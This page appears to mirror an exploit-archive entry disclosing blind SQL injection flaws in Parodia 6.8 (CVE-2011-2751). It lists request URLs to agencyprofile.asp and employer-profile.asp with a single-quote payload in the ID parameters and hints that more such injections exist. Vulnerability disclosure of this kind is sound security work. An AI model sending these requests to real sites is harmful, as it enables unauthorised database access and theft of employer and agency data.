Skip to content
cyberexploits
webappasptext

Parodia 6.8 - employer-profile.asp SQL Injection

Parodia 6.8 - employer-profile.asp SQL Injection

Publié le 2012-06-25

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/asp/webapps/19394.txt7eac4c3a
raw
# Exploit Title: Parodia 6.8 and early SQL injection

# Date: June 24 2012

# Exploit Author:Carlos Mario Penagos Hollmann

# Vendor Homepage: http://www.parodia.net/

# Version: 6.8

# CVE : CVE-2011-2751







http://server/' ---> blind SQL



http://server/agencyprofile.asp?AG_ID='

http://server/employer-profile.asp?ag_id='



There are other SQL Blind  injections ;)

Voir sur GitHub